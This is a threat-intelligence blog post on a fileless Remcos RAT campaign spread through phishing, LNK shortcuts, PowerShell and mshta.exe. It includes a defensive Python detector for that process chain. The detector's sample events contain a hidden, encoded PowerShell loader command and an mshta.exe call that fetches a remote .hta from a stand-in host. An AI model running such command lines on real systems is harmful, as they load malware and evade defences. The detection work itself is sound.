Fileless, Fearless, and in Your Network – The 2025 Remcos RAT Surge

In May 2025, a stealthy malware campaign was identified delivering a fileless variant of the Remcos Remote Access Trojan (RAT) via malicious Windows Shortcut (LNK) files and PowerShell-based execution chains. The campaign exemplifies how attackers are increasingly bypassing traditional security controls by leveraging native Windows tools like mshta.exe to execute payloads directly in memory — leaving minimal forensic traces.

Phishing emails, often themed around taxes, are used to lure victims into triggering the infection chain, ultimately granting attackers full remote access. This operation highlights a broader trend in cybercrime: the weaponisation of legitimate system components and fileless techniques to quietly establish persistent control, exfiltrate data, and evade detection. Remcos, once a commercial RAT, continues to evolve as a favoured tool in espionage, fraud, and credential theft — with this campaign marking a sharp escalation in its stealth and delivery.

These developments reinforce the need for a defence-in-depth strategy. Relying solely on a single security vendor — especially Microsoft Defender, which is deeply integrated into Windows and frequently targeted by attackers — leaves organisations exposed to blind spots. Combining complementary detection layers, including network, behavioural, and memory-based analysis, is essential to identify and disrupt modern threats that bypass conventional, signature-based defences.
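As an added illustration of the behavioural layer described above (this is example code written for this post, not CyberStash's or the report's own tooling), the script below runs a simple parent/child check over constructed, Sysmon-style process-creation records and flags the Explorer → hidden/encoded PowerShell → mshta.exe pattern used by the LNK delivery chain; the field names, sample paths and the example.invalid URL are assumptions.

```python
import re
from dataclasses import dataclass

@dataclass
class ProcEvent:  # constructed, Sysmon-style process-creation record (sample data, not real telemetry)
    pid: int
    ppid: int
    image: str    # full path of the executable
    cmdline: str  # command line as logged

# PowerShell switches typical of a shortcut-launched loader: hidden window, policy bypass, encoded command
PS_SUSPICIOUS = re.compile(
    r"-(w(indowstyle)?\s+hidden|e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}|e(xecutionpolicy|p)\s+bypass)", re.I)
# mshta.exe handed a URL or inline script instead of a local .hta file
MSHTA_NONLOCAL = re.compile(r"https?://|vbscript:|javascript:|about:", re.I)
def basename(path: str) -> str:
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()

def ancestry(events, pid):
    """Image names from pid up to the root, e.g. ['mshta.exe', 'powershell.exe', 'explorer.exe']."""
    by_pid, chain = {e.pid: e for e in events}, []
    while pid in by_pid and len(chain) < 64:  # depth guard against cyclic or recycled PIDs
        chain.append(basename(by_pid[pid].image))
        pid = by_pid[pid].ppid
    return chain

def detect_lnk_mshta_chain(events):
    """Return (pid, reason) pairs for events matching the LNK -> PowerShell -> mshta pattern."""
    by_pid, hits = {e.pid: e for e in events}, []
    for e in events:
        img, parent = basename(e.image), by_pid.get(e.ppid)
        pimg = basename(parent.image) if parent else ""
        # Explorer starting a hidden/encoded PowerShell is how a double-clicked LNK runs its target
        if img == "powershell.exe" and pimg == "explorer.exe" and PS_SUSPICIOUS.search(e.cmdline):
            hits.append((e.pid, "hidden or encoded PowerShell launched from Explorer"))
        if img == "mshta.exe" and pimg == "powershell.exe":
            hits.append((e.pid, "mshta.exe spawned by PowerShell"))
        if img == "mshta.exe" and MSHTA_NONLOCAL.search(e.cmdline):
            hits.append((e.pid, "mshta.exe given a URL or inline script rather than a local .hta"))
    return hits

# Constructed sample events: one shortcut-style chain (100 -> 200 -> 300) plus two benign launches
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    ProcEvent(100, 1, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcEvent(200, 100, PS, "powershell.exe -w hidden -ep bypass -enc QQBBAEEAQQBBAEEAQQBBAEEAQQA="),
    ProcEvent(300, 200, r"C:\Windows\System32\mshta.exe", "mshta.exe http://example.invalid/loader.hta"),
    ProcEvent(400, 100, PS, r"powershell.exe -NoProfile -File C:\scripts\inventory.ps1"),
    ProcEvent(500, 100, r"C:\Windows\System32\mshta.exe", r"mshta.exe C:\Program Files\App\help.hta"),
]
```

Calling `detect_lnk_mshta_chain(SAMPLE_EVENTS)` flags only PIDs 200 and 300, and `ancestry(SAMPLE_EVENTS, 300)` reconstructs the full chain for the alert; the two benign launches produce no hits.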

Download Report:
https://www.cyberstash.com/wp-content/uploads/2025/05/Stealth-Tactics-Unveiled-Fileless-Remcos-RAT-Attack-Using-PowerShell-and-LNK-Files.pdf
